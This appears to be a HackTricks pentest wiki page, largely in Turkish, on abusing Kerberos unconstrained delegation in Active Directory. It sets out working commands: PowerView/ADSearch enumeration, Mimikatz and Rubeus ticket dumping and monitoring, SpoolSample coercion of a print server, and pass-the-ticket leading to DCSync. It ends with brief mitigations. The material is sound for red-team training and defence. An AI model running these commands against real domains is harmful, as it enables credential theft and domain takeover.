Unconstrained Delegation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Unconstrained delegation

Bu, bir Alan Yöneticisinin alan içindeki herhangi bir Bilgisayara ayarlayabileceği bir özelliktir. Daha sonra, bir kullanıcı Bilgisayara giriş yaptığında, o kullanıcının TGT'sinin bir kopyası DC tarafından sağlanan TGS'ye gönderilecek ve LSASS'te bellekte saklanacaktır. Yani, makinede Yönetici ayrıcalıklarınız varsa, biletleri dökebilir ve kullanıcıları taklit edebilirsiniz.

Eğer bir alan yöneticisi "Sınırsız Delegasyon" özelliği etkin olan bir Bilgisayara giriş yaparsa ve o makinede yerel yönetici ayrıcalıklarınız varsa, bileti dökebilir ve Alan Yöneticisini her yerde taklit edebilirsiniz (alan privesc).

Bu özelliğe sahip Bilgisayar nesnelerini bulabilirsiniz; userAccountControl niteliğinin ADS_UF_TRUSTED_FOR_DELEGATION içerip içermediğini kontrol ederek. Bunu ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ LDAP filtresi ile yapabilirsiniz; bu, powerview'ün yaptığıdır:

# Sınırsız bilgisayarları listele
## Powerview
Get-NetComputer -Unconstrained #DC'ler her zaman görünür ama privesc için faydalı değildir
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Mimikatz ile biletleri dışa aktar
privilege::debug
sekurlsa::tickets /export #Tavsiye edilen yol
kerberos::list /export #Başka bir yol

# Girişleri izleyin ve yeni biletleri dışa aktarın
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Yeni TGT'ler için her 10 saniyede bir kontrol et

Yönetici (veya kurban kullanıcının) biletini bellekte Mimikatz veya Rubeus ile yükleyin Bileti Geç. Daha fazla bilgi: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ Sınırsız delegasyon hakkında daha fazla bilgi ired.team'de.

Zorla Kimlik Doğrulama

Eğer bir saldırgan "Sınırsız Delegasyona" izin verilen bir bilgisayarı ele geçirebilirse, bir Yazıcı sunucusunu otomatik olarak giriş yapmaya kandırabilir ve bu da sunucunun belleğinde bir TGT kaydedebilir. Daha sonra, saldırgan Bileti Geç saldırısı yaparak yazıcı sunucu bilgisayar hesabını taklit edebilir.

Bir yazıcı sunucusunu herhangi bir makineye giriş yapması için SpoolSample kullanabilirsiniz:

.\SpoolSample.exe <printmachine> <unconstrinedmachine>

Eğer TGT bir etki alanı denetleyicisinden (DC) geliyorsa, bir DCSync attack gerçekleştirebilir ve DC'den tüm hash'leri elde edebilirsiniz. Bu saldırı hakkında daha fazla bilgi ired.team'de.

Kimlik doğrulamayı zorlamak için diğer yollar:

Force NTLM Privileged Authentication

Mitigasyon

DA/Yönetici girişlerini belirli hizmetlerle sınırlayın
Ayrıcalıklı hesaplar için "Hesap hassas ve devredilemez" ayarını yapın.

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousSkeleton Key NextWindows Security Controls

Last updated 1 month ago